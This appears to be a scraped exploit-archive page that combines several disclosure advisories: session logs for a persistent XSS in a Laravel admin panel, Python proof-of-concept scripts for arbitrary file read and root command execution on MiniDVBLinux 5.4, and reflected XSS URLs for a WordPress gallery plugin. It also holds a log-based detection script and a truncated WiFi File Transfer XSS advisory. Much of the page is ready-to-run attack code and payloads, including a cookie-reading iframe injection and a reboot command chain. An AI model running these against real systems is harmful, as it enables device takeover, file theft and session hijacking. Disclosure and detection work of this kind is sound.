Successful reproduce of the persistent cross site scripting web vulnerability!<br /><br /><br />--- PoC Session Logs (POST [Inject via User Role by Profile Account Update|Create] ---<br />https://knap.froid.works/profiles/102<br />Host: knap.froid.works<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------73425417436906186553080920069<br />Content-Length: 29455<br />Origin:https://knap.froid.works<br />Connection: keep-alive<br />Referer:https://knap.froid.works/profile-edit<br />Cookie: laravel_session=eyJpdiI6Ikt4Zmd3WDVSeThObVlvbnZld1JadWc9PSIsInZhbHVlIjoiN3pubk1YaVwvaWp6aWF2QlNwb3l2T2<br />h5MzdHZjJUd0Y2em1mUXE4Q1wvZHhnbkhwUW1ZaDU3aytaWFNURk5pc1M4IiwibWFjIjoiM2UwMTg0MGQ0M2VjMDk0YTVkN2M0ZGVjOWM5NmI1NDMzYzUxODU5ZmVkNmNmZDJlMTc5ZmVlYThiNTlkODIxZCJ9<br />0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B<br />&28=e&29=8&30=T&31=X&32=0&33=F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h<br />&53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63=e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3<br />&78=C&79=i&80=m&81=g&82=%&83=3&84=E&85=%&86=3&87=E&88=%&89=2&90=2&91=%&92=3&93=C&94=i&95=f&96=r&97=a&98=m&99=e&100=+&101=s<br />&102=r&103=c&104=%&105=3&106=D&107=e&108=v&109=i&110=l&111=.&112=s&113=o&114=u&115=r&116=c&117=e&118=+&119=o&120=n&121=l&122=o<br />&123=a&124=d&125=%&126=3&127=D&128=a&129=l&130=e&131=r&132=t&133=(&134='&135=P&136=W&137=N&138=D&139='&140=)&141=%&142=3<br />&143=E&144=%&145=3&146=C&147=%&148=2&149=F&150=i&151=f&152=r&153=a&154=m&155=e&156=%&157=3&158=E&159=&&160=t&161=y&162=p&163=e&164==&165=p&166=e&167=r&168=s&169=o&170=n&171=a&172=l&173=I&174=n&175=f&176=o<br 
/>&177=&&178=e&179=m&180=a&181=i&182=l&183==&184=f&185=t&186=p&187=%&188=4&189=0&190=l&191=i&192=v&193=e&194=.&195=c&196=o<br />&197=m&198=&&199=d&200=o&201=b&202==&203=2&204=0&205=2&206=1&207=-&208=0&209=9&210=-&211=1&212=0&213=&&214=g&215=e&216=n&217=d&218=e&219=r&220==&221=m&222=a&223=l&224=e&225=&&226=c&227=u&228=s&229=t&230=o<br />&231=m&232=_&233=f&234=i&235=e&236=l&237=d&238=s&239=_&240=d&241=a&242=t&243=a&244=%&245=5&246=B&247=u&248=r&249=b&250=_<br />&251=1&252=%&253=5&254=D&255==&256=t&257=e&258=s<br />&259=t&260=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert('PWND')></iframe>&type=personalInfo<br />&email=ftp@live.com&dob=2021-09-10&gender=male&custom_fields_data[urb_1]=teste<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.39 (Ubuntu)<br />Set-Cookie:<br />laravel_session=eyJpdiI6Ik1zbUliRHJrMjNqY2pPcDQ5aENtYVE9PSIsInZhbHVlIjoiRjVYTG9aNjJUTlwvbHJDZ2xQbUx6V1hTOFg2SnlWeTBDYW1HVHNVOEJ4bUR<br />KZ3ExMFVRcEE0bEI5OURMUm55RVciLCJtYWMiOiIzMzg2OTAyZTcyMDJmOGQ0ZWY5MWNjY2ZkZmRkOTA3NzA2NjI1NzViOWM5OWVlMzE0ZTZjMzhjMjRjMjE0N2VhIn0%3D;<br />expires=Fri, 10-Sep-2021 19:09:50 GMT; Max-Age=7200; path=/; httponly<br />Content-Length: 53<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/json<br /><br /><br /><br />--- PoC Session Logs (POST [Inject via Admin Role] ---<br />https://knap.froid.works/users/102<br />Host: knap.froid.works<br />Accept: application/json, text/javascript, */*; q=0.01<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------23081715668612801831491484963<br />Content-Length: 39263<br />Origin:https://knap.froid.works<br />Connection: keep-alive<br />Referer:https://knap.froid.works/users<br />Cookie: laravel_session=eyJpdiI6IktJUUlXU21TZHZGRHdkNEczbGZwMXc9PSIsInZhbHVlIjoidlhcLzl3cU1UbHVwZFVDclhkXC9CZGdDNkh<br 
/>XTEtlTnNmNWlWY3hwRzd3ZFNUcVI3R1plVHc1NE5tRUJoVmxobElQIiwibWFjIjoiODYyMmNiMjFlYTJjYzdkNGZkOTI2ZWQzYjg2M2U5OTA5NWI5NzVhYzExOWYzYTcwMTkyOTk1ZDMxOGRhNWE3OSJ9<br />0=_&1=t&2=o&3=k&4=e&5=n&6==&7=S&8=B&9=0&10=q&11=T&12=5&13=b&14=O&15=B&16=k&17=R&18=w&19=d&20=n&21=U&22=J&23=M&24=A&25=z&26=g&27=B&28=e&29=8&30=T&31=X&32=0&33=<br />F&34=q&35=v&36=N&37=L&38=b&39=J&40=I&41=j&42=M&43=k&44=1&45=B&46=z&47=&&48=_&49=m&50=e&51=t&52=h&53=o&54=d&55==&56=P&57=U&58=T&59=&&60=n&61=a&62=m&63=<br />e&64==&65=P&66=i&67=p&68=p&69=o&70=%&71=2&72=2&73=%&74=3&75=E&76=%&77=3&78=C&79=i&80=f&81=r&82=a&83=m&84=e&85=%&86=3&87=E&88=%&89=3&90=E&91=%&92=2&93=<br />2&94=%&95=3&96=C&97=i&98=f&99=r&100=a&101=m&102=e&103=+&104=s&105=r&106=c&107=%&108=3&109=D&110=e&111=v&112=i&113=l&114=.&115=s&116=o&117=u&118=r&119=<br />c&120=e&121=+&122=o&123=n&124=l&125=o&126=a&127=d&128=%&129=3&130=D&131=a&132=l&133=e&134=r&135=t&136=(&137=d&138=o&139=c&140=u&141=m&142=e&143=n&144=<br />t&145=.&146=c&147=o&148=o&149=k&150=i&151=e&152=)&153=%&154=3&155=E&156=%&157=3&158=C&159=%&160=2&161=F&162=i&163=f&164=r&165=a&166=m&167=e&168=%&169=3&170=E&171=&&172=e&173=m&174=a&175=i&176=l&177==&178=f&179=e&180=l&181=i&182=x&183=d&184=i&185=r&186=%&187=4&188=0&189=l&190=i&191=v&192=<br />e&193=.&194=c&195=o&196=m&197=&&198=d&199=o&200=b&201==&202=2&203=0&204=2&205=1&206=-&207=0&208=9&209=-&210=1&211=0&212=&&213=g&214=e&215=n&216=d&217=e&218=r&219==&220=m&221=a&222=l&223=e&224=&&225=p&226=a&227=s&228=s&229=w&230=o&231=r&232=<br />d&233==&234=&&235=x&236=C&237=o&238=o&239=r&240=d&241=O&242=n&243=e&244==&245=&&246=y&247=C&248=o&249=o&250=r&251=d&252=O&253=n&254=<br />e&255==&256=&&257=p&258=r&259=o&260=f&261=i&262=l&263=e&264=I&265=m&266=a&267=g&268=e&269=W&270=i&271=d&272=t&273=h&274==&275=&&276=<br />p&277=r&278=o&279=f&280=i&281=l&282=e&283=I&284=m&285=a&286=g&287=e&288=H&289=e&290=i&291=g&292=h&293=t&294==&295=&&296=c&297=u&298=<br 
/>s&299=t&300=o&301=m&302=_&303=f&304=i&305=e&306=l&307=d&308=s&309=_&310=d&311=a&312=t&313=a&314=%&315=5&316=B&317=u&318=r&319=b&320=_&321=1&322=%&323=5&324=D&325==&326=a&327=s&328=d&329=a&330=&&331=s&332=t&333=a&334=t&335=u&336=s&337==&338=a&339=c&340=t&341=<br />i&342=v&343=e&_token=SB0qT5bOBkRwdnUJMAzgBe8TX0FqvNLbJIjMk1Bz&_method=PUT&name=Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>&email=felixdir@live.com&dob=2021-09-10&gender=male&password=&image=&xCoordOne=&yCoordOne=&profileImageWidth=&profileImageHeight=&custom_fields_data[urb_1]=asda&status=active<br />-<br />POST: HTTP/1.1 200 OK<br />Server: Apache/2.4.39 (Ubuntu)<br />Set-Cookie:<br />laravel_session=eyJpdiI6IjdiMGZ5MHYzYklHbXpMS3FXK3ExTWc9PSIsInZhbHVlIjoid04yKzJWXC9wMzNEdVdheWJUVHNNS0c5VHQ3R2Y2OGpqY0U1a2VcLzRoM1<br />hIbzNrZDZCZk45SnhwRW5jTXhNMzNWIiwibWFjIjoiNDJmNGE3ZDgzMDU5Mzk5MjA0MzQwZWJhOGRkZTg0N2FmZWI0NGM4ZjNkZjg3M2Y1ZWNjNjQ2OTM1YTk3Y2UyOSJ9;<br />expires=Fri, 10-Sep-2021 18:52:58 GMT; Max-Age=7200; path=/; httponly<br />Content-Length: 53<br />Keep-Alive: timeout=5, max=100<br />Connection: Keep-Alive<br />Content-Type: application/json<br /><br /><br />Vulnerable Source: ./users (knap.deleteAlert)<br /><table class="table table-striped table-bordered table-hover table-checkable order-column dataTable no-footer" id="users" role="grid" aria-describedby="users_info" style="width: 1568px;"><br /><thead><br /><tr role="row"><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 57px;" aria-label="ID: activate to sort column ascending">ID</th><br /><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 67px;" aria-label="Avatar: activate to sort column ascending">Avatar</th><br /><th class="sorting_asc" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 120px;" aria-label="Name: activate to sort column descending"<br />aria-sort="ascending">Name</th><th class="sorting" 
tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 257px;"<br />aria-label="Email: activate to sort column ascending">Email</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1"<br />style="width: 73px;" aria-label="Gender: activate to sort column ascending">Gender</th><th class="sorting_disabled" rowspan="1" colspan="1"<br />style="width: 258px;" aria-label="Roles">Roles</th><th class="sorting" tabindex="0" aria-controls="users" rowspan="1" colspan="1" style="width: 64px;"<br />aria-label="Status: activate to sort column ascending">Status</th><th class="sorting_disabled" rowspan="1" colspan="1" style="width: 323px;" aria-label="Actions">Actions</th></tr><br /></thead><br /><tbody><br /><tr role="row" class="odd"><td>19</td><td><img src="https://www.gravatar.com/avatar/18228d88bbd04db784b489f7ad9402e0?d=mm&s=250" height="100px"></td><br /><td class="sorting_1">Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></td><td>test@test.de</td><br /><td><span id="status19" class="label bg-blue disabled color-palette"> <i class="fa fa-male"></i> male</span></td><td><ul><li>Role Dashboard</li></ul></td><td><span class="label label-sm label-success">Active</span></td><br />-<br /><a style="margin: 1px;" href="javascript:;" onclick="knap.deleteAlert('users','Are you sure you want to delete <strong>Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe>?<br />This action cannot be undone.',19)" class="btn btn-sm btn-danger red"><i class="fa fa-trash"></i> Delete</a><br /><br /><br /><br />Vulnerable Source: ./activity<br /><div class="portlet light bordered"><br /><div class="portlet-title"><br /><div class="caption font-dark"><br /><i class="icon-clock"></i><br /><span class="caption-subject bold uppercase"> Activity Log </span><br /></div><br /><div class="actions"><br /></div></div><br /><div class="portlet-body"><br /><div class="table-toolbar"><br /><div 
class="row"><br /><div class="col-md-6"><br /></div></div></div><br /><div id="activity_wrapper" class="dataTables_wrapper no-footer"><div class="row"><div class="col-md-6 col-sm-6"><div class="dataTables_length" id="activity_length"><br /><label>Show <select name="activity_length" aria-controls="activity" class="form-control input-sm input-xsmall input-inline"><option value="10">10</option><br /><option value="15">15</option><option value="20">20</option><option value="-1">All</option></select> records</label></div></div><div class="col-md-6 col-sm-6"><br /><div id="activity_filter" class="dataTables_filter"><label>Search:<input type="search" class="form-control input-sm input-small input-inline" placeholder=""<br />aria-controls="activity"></label></div></div><div id="activity_processing" class="dataTables_processing" style="display: none;">Processing...</div></div><br /><div class="table-scrollable"><table class="table table-striped table-bordered table-hover order-column dataTable no-footer" id="activity" role="grid"<br />aria-describedby="activity_info" style="width: 1566px;"><br /><thead><br /><tr role="row"><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 61px;" aria-label="ID: activate to sort column<br />ascending">ID</th><th class="sorting" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 1093px;" aria-label="Message: activate to sort<br />column ascending">Message</th><th class="sorting_desc" tabindex="0" aria-controls="activity" rowspan="1" colspan="1" style="width: 266px;" aria-sort="descending"<br />aria-label="Log Time: activate to sort column ascending">Log Time</th></tr><br /></thead><br /><tbody><br /><tr role="row" class="odd"><td>114</td><td>Admin updated role <strong>role-activity-log</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:03 PM</td></tr><br /><tr role="row" class="even"><td>113</td><td>Admin updated role 
<strong>role-activity-log"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong><br />successfully</td><td class="sorting_1">Fri, Sep 10, 2021 5:02 PM</td></tr><tr role="row" class="odd"><td>112</td><td>Admin updated user <strong>Abdul Zboncak</strong> successfully</td><br /><td class="sorting_1">Fri, Sep 10, 2021 5:02 PM</td></tr><tr role="row" class="even"><td>111</td><td>Admin updated user<br /><strong>Abdul Zboncak"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><br /><tr role="row" class="odd"><td>110</td><td>Admin deleted user <strong>a</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="even"><br /><td>109</td><td>Admin updated user <strong>a</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:57 PM</td></tr><tr role="row" class="odd"><td>108</td><br /><td>Admin created user <strong>a"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td><br /></tr><tr role="row" class="even"><td>107</td><td>Admin updated user <strong>Pippo</strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:56 PM</td></tr><br /><tr role="row" class="odd"><td>106</td><td>Admin updated user <strong>Pippo"><img>>"<iframe src=evil.source onload=alert(document.cookie)></iframe></strong><br />successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr><tr role="row" class="even"><td>105</td><br /><td>Admin updated user <strong>Pippo>"<iframe src="evil.source" onload="alert(document.cookie)"></iframe></strong> successfully</td><td class="sorting_1">Fri, Sep 10, 2021 4:52 PM</td></tr></tbody><br /></table></div><div class="row"><div class="col-md-5 col-sm-5"><div class="dataTables_info" id="activity_info"<br />role="status" aria-live="polite">Showing 1 to 10 of 100 
records</div></div><div class="col-md-7 col-sm-7"><div class="dataTables_paginate paging_bootstrap_full_number"<br />id="activity_paginate"><ul class="pagination" style="visibility: visible;"><li class="prev disabled"><a href="#" title="First"><i class="fa fa-angle-double-left"></i></a><br /></li><li class="prev disabled"><a href="#" title="Prev"><i class="fa fa-angle-left"></i></a></li><li class="active"><a href="#">1</a></li><li><a href="#">2</a></li><br /><li><a href="#">3</a></li><li><a href="#">4</a></li><li><a href="#">5</a></li><li class="next"><a href="#" title="Next"><i class="fa fa-angle-right"></i></a></li><br /><li class="next"><a href="#" title="Last"><i class="fa fa-angle-double-right"></i></a></li></ul></div></div></div></div><br /></div><br /></div><br /><br /><br /><br />Solution - Fix & Patch:<br />=======================<br />The persistent xss web vulnerability can be resolved by the following steps ...<br />1. Restrict the input fields of the name parameter to disallow special chars for the registration and update account information<br />2. Encode and escape the content of the name parameter to sanitize the registration and update account information<br />3. Sanitize and filter the output locations of the users and the activity log list modules<br /><br /><br />Credits & Authors:<br />==================<br />Vulnerability-Lab [Research Team] -https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab<br /><br /><br />Disclaimer & Information:<br />=========================<br />The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,<br />either expressed or implied, including the warranties of merchantability and capability for a particular purpose. 
Vulnerability-Lab<br />or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits<br />or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do<br />not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.<br />We do not approve or encourage anybody to break any licenses, policies, deface websites, hack into databases or trade with stolen data.<br /><br />Domains: www.vulnerability-lab.com www.vuln-lab.com www.vulnerability-db.com<br />Services: magazine.vulnerability-lab.com paste.vulnerability-db.com infosec.vulnerability-db.com<br />Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab youtube.com/user/vulnerability0lab<br />Feeds: vulnerability-lab.com/rss/rss.php vulnerability-lab.com/rss/rss_upcoming.php vulnerability-lab.com/rss/rss_news.php<br />Programs: vulnerability-lab.com/submit.php vulnerability-lab.com/register.php vulnerability-lab.com/list-of-bug-bounty-programs.php<br /><br />Any modified copy or reproduction, including partial usage, of this file requires authorization from Vulnerability Laboratory.<br />Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other<br />media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other<br />information on this website are trademarks of the vulnerability-lab team & the specific authors or managers. To record, list, modify, use or<br />edit our material contact (admin@ or research@) to ask for permission.<br /><br /> Copyright © 2022 | Vulnerability Laboratory - [Evolution Security GmbH]™<br /><br /><br /><br />-- <br />VULNERABILITY LABORATORY (VULNERABILITY LAB)<br />RESEARCH, BUG BOUNTY & RESPONSIBLE DISCLOSURE<br /><br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Arbitrary File Read Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The distribution suffers from an arbitrary file disclosure<br /># vulnerability. Using the 'file' GET parameter attackers can disclose<br /># arbitrary files on the affected device and disclose sensitive and system<br /># information.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5719<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5719.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re,sys<br /><br />#test case 001<br />#http://ip:8008/?site=about&name=MLD%20about&file=/boot/ABOUT<br /><br />if len(sys.argv) < 3:<br /> print('MiniDVBLinux 5.4 File Disclosure PoC')<br /> print('Usage: ./mldhd_fd.py [url] [file]')<br /> sys.exit(17)<br />else:<br /> url = sys.argv[1]<br /> fil = sys.argv[2]<br /><br />req = requests.get(url+'/?site=about&name=ZSL&file='+fil)<br />outz = re.search('<pre>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('<pre>','').replace('</pre>',''))<br /></code></pre>
<pre><code>┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />││ C r a C k E r ┌┘<br />┌┘ T H E C R A C K O F E T E R N A L M I G H T ││<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br /> ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ [ Exploits ] ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: Author : CraCkEr :<br />│ Website : wordpress.org/plugins/ │<br />│ Vendor : Photo Gallery Team - wpsofts.com │<br />│ Software : WordPress Photo Gallery 1.8.0 │<br />│ Vuln Type: Reflected XSS │<br />│ Method : GET │<br />│ Impact : Manipulate the content of the site │<br />│ │<br />│────────────────────────────────────────────────────────────────────────────────────────│<br />│ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br />: :<br />│ Release Notes: │<br />│ ═════════════ │<br />│ An attacker who sends the victim a link containing a malicious URL in an email or │<br />│ instant message can perform a wide variety of actions, such as stealing the victim's │<br />│ session token or login credentials. │<br />│ │<br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />Greets:<br /><br /> The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL <br /> <br /> CryptoJob (Twitter) twitter.com/CryptozJob<br /> <br />┌┌───────────────────────────────────────────────────────────────────────────────────────┐<br />┌┘ © CraCkEr 2022 ┌┘<br />└───────────────────────────────────────────────────────────────────────────────────────┘┘<br /><br />URL parameter 'pg' is vulnerable to XSS<br /><br />Path: /photo-gallery/<br /><br />https://wpsofts.com/grid-kit-demo/photo-gallery/?pid=47&pg=2&zdifv%2527%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eh18n1=1<br /><br /><br />URL parameter 'pid' is vulnerable to XSS<br /><br />Path: /photo-gallery/<br /><br />https://wpsofts.com/grid-kit-demo/photo-gallery/?pida2sg4%27%2dalert%281%29%2d%27z632u&pg=2<br /><br /><br />[-] Done<br /></code></pre>
<pre><code>#!/usr/bin/env python3<br />#<br />#<br /># MiniDVBLinux 5.4 Remote Root Command Execution Vulnerability<br />#<br />#<br /># Vendor: MiniDVBLinux<br /># Product web page: https://www.minidvblinux.de<br /># Affected version: <=5.4<br />#<br /># Summary: MiniDVBLinux(TM) Distribution (MLD). MLD offers a simple<br /># way to convert a standard PC into a Multi Media Centre based on the<br /># Video Disk Recorder (VDR) by Klaus Schmidinger. Features of this<br /># Linux based Digital Video Recorder: Watch TV, Timer controlled<br /># recordings, Time Shift, DVD and MP3 Replay, Setup and configuration<br /># via browser, and a lot more. MLD strives to be as small as possible,<br /># modular, simple. It supports numerous hardware platforms, like classic<br /># desktops in 32/64bit and also various low power ARM systems.<br />#<br /># Desc: The application suffers from an OS command execution vulnerability.<br /># This can be exploited to execute arbitrary commands as root, through the<br /># 'command' GET parameter in /tpl/commands.sh.<br />#<br /># Tested on: MiniDVBLinux 5.4<br /># BusyBox v1.25.1<br /># Architecture: armhf, armhf-rpi2<br /># GNU/Linux 4.19.127.203 (armv7l)<br /># VideoDiskRecorder 2.4.6<br />#<br />#<br /># Vulnerability discovered by Gjoko 'LiquidWorm' Krstic<br /># @zeroscience<br />#<br />#<br /># Advisory ID: ZSL-2022-5718<br /># Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5718.php<br />#<br />#<br /># 24.09.2022<br />#<br /><br />import requests<br />import re,sys<br /><br />#test case 002<br />#http://ip:8008/?site=commands&section=system&command=sleep%201;reboot<br />#-<br />#test case 003<br />#http://ip:8008/?site=commands&section=system&command=id<br />#uid=0(root) gid=0(root)<br /><br />if len(sys.argv) < 3:<br /> print('MiniDVBLinux 5.4 Command Execution PoC')<br /> print('Usage: ./mldhd_root1.py [url] [cmd]')<br /> sys.exit(17)<br />else:<br /> url = sys.argv[1]<br /> cmd = sys.argv[2]<br /><br />req = requests.get(url+'/?site=commands&section=system&command='+cmd)<br />req = requests.get(url+'/?site=commands&section=system&command='+cmd)<br />outz = re.search('log\'>(.*?)</pre>',req.text,flags=re.S).group()<br />print(outz.replace('log\'>','').replace('</pre>',''))<br /></code></pre>
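Detection logic for the two MiniDVBLinux issues described in the PoC headers above (arbitrary file read through the 'file' parameter in ZSL-2022-5719, root command execution through the 'command' parameter in ZSL-2022-5718), written as an added example that is not part of either advisory or of MLD itself. The web-server log format, the ALLOWED_COMMANDS names and the /boot/ prefix are assumptions chosen for illustration; the sample log lines are constructed from the advisories' own test-case URLs.

```python
"""Log-based detection for the MLD web UI 'file' and 'command' parameters.
Added example; the log format, allowlist and prefix below are assumptions."""
import re
from urllib.parse import urlsplit, unquote, unquote_plus

# Common Log Format request line (assumed; adjust to the server's real format).
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<target>\S+) \S+" (?P<status>\d{3})')
# Characters that let a value break out of a shell command built from it.
SHELL_META = re.compile(r'[;|&`$<>\n]')
# Hypothetical names the UI legitimately passes; MLD's real set is not on the page.
ALLOWED_COMMANDS = {'show_log', 'restart_vdr'}
# The advisory's own test case reads /boot/ABOUT; anything else is out of policy.
ALLOWED_FILE_PREFIX = '/boot/'


def query_params(target):
    """Split the query string on '&' only, so 'sleep%201;reboot' stays one value."""
    params = {}
    for pair in urlsplit(target).query.split('&'):
        if not pair:
            continue
        key, _, value = pair.partition('=')
        params.setdefault(unquote(key), []).append(unquote_plus(value))
    return params


def classify(target):
    """Return finding strings for one request target; an empty list means benign."""
    findings = []
    params = query_params(target)
    site = params.get('site', [''])[0]
    if site == 'commands':
        for cmd in params.get('command', []):
            if SHELL_META.search(cmd):
                findings.append('shell metacharacters in command parameter: %r' % cmd)
            elif cmd not in ALLOWED_COMMANDS:
                findings.append('command not on allowlist: %r' % cmd)
    elif site == 'about':
        for path in params.get('file', []):
            if '..' in path or not path.startswith(ALLOWED_FILE_PREFIX):
                findings.append('file parameter outside %s: %r' % (ALLOWED_FILE_PREFIX, path))
    return findings


def scan(log_text):
    """Return (client_ip, target, findings) for every log line that raises a finding."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if match is None:
            continue
        findings = classify(match['target'])
        if findings:
            hits.append((match['ip'], match['target'], findings))
    return hits


# Constructed sample log: the advisories' test-case URLs plus two benign requests.
SAMPLE_LOG = """\
192.0.2.10 - - [24/Sep/2022:10:00:01 +0000] "GET /?site=about&name=MLD%20about&file=/boot/ABOUT HTTP/1.1" 200 512
192.0.2.10 - - [24/Sep/2022:10:00:05 +0000] "GET /?site=about&name=ZSL&file=/etc/hostname HTTP/1.1" 200 301
192.0.2.10 - - [24/Sep/2022:10:00:09 +0000] "GET /?site=commands&section=system&command=id HTTP/1.1" 200 290
192.0.2.10 - - [24/Sep/2022:10:00:12 +0000] "GET /?site=commands&section=system&command=sleep%201;reboot HTTP/1.1" 200 270
192.0.2.20 - - [24/Sep/2022:10:01:00 +0000] "GET /?site=commands&section=system&command=show_log HTTP/1.1" 200 4096
"""

if __name__ == '__main__':
    for ip, target, findings in scan(SAMPLE_LOG):
        print(ip, target, '; '.join(findings))
```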
<pre><code>Document Title:<br />===============<br />WiFi File Transfer v1.0.8 - Cross Site Scripting Vulnerabilities<br /><br /><br />References (Source):<br />====================<br />https://www.vulnerability-lab.com/get_content.php?id=2322<br /><br /><br />Release Date:<br />=============<br />2022-10-17<br /><br /><br />Vulnerability Laboratory ID (VL-ID):<br />====================================<br />2322<br /><br /><br />Common Vulnerability Scoring System:<br />====================================<br />5.6<br /><br /><br />Vulnerability Class:<br />====================<br />Cross Site Scripting - Persistent<br /><br /><br />Current Estimated Price:<br />========================<br />500€ - 1.000€<br /><br /><br />Product & Service Introduction:<br />===============================<br />WiFi File Transfer lets you transfer files to/from your phone or tablet via WiFi. Easy to use web interface, no USB cable required.<br /><br />(Copy of the Homepage:https://play.google.com/store/apps/details?id=com.smarterdroid.wififiletransfer&hl=de&gl=US )<br /><br /><br />Abstract Advisory Information:<br />==============================<br />The vulnerability laboratory core research team discovered multiple persistent cross site scripting vulnerabilities in the WiFi File Transfer v1.0.8 mobile android web-application.<br /><br />Affected Product(s):<br />====================<br />smarterDroid<br />Product: WiFi File Transfer v1.0.8 - Android (Wifi) (Web-Application)<br /><br /><br />Vulnerability Disclosure Timeline:<br />==================================<br />2022-10-17: Public Disclosure (Vulnerability Laboratory)<br /><br /><br />Discovery Status:<br />=================<br />Published<br /><br /><br />Exploitation Technique:<br />=======================<br />Remote<br /><br /><br />Severity Level:<br />===============<br />Medium<br /><br /><br />Authentication Type:<br />====================<br />Open Authentication (Anonymous Privileges)<br /><br /><br />User Interaction:<br />=================<br />Low User Interaction<br /><br /><br />Disclosure Type:<br />================<br />Independent Security Research<br /><br /><br />Technical Details & Description:<br />================================<br />A persistent input validation web vulnerability has been discovered in the WiFi File Transfer v1.0.8 mobile web-application for android.<br />The vulnerability allows remote attackers to inject their own malicious script code with a persistent attack vector to compromise browser-to-web-application<br />requests from the application side.<br /><br />The vulnerabilities are located in the data_file parameter of the add a file or folder function and the create a zip file function.<br />Attackers with wifi access are able to use the web UI anonymously and can inject their own malicious script code with a persistent<br />attack vector via a POST method request.<br /><br />Successful exploitation of the vulnerability results in session hijacking, persistent phishing attacks, persistent external<br />redirects to malicious sources and persistent manipulation of affected application modules.<br /><br /><br />Proof of Concept (PoC):<br />=======================<br />The persistent POST inject web vulnerabilities can be exploited by remote attackers in the same wifi network with anonymous privileges and low user interaction.<br />For security demonstration or to reproduce the web security vulnerability in the application follow the provided information and steps below to continue.<br /><br /><br />Manual reproduction of the vulnerability ...<br />1. Install the mobile android application and start it<br />2. Start the wifi web-server<br />3. Log in as the attacker via the browser over the network<br />4. Inject the 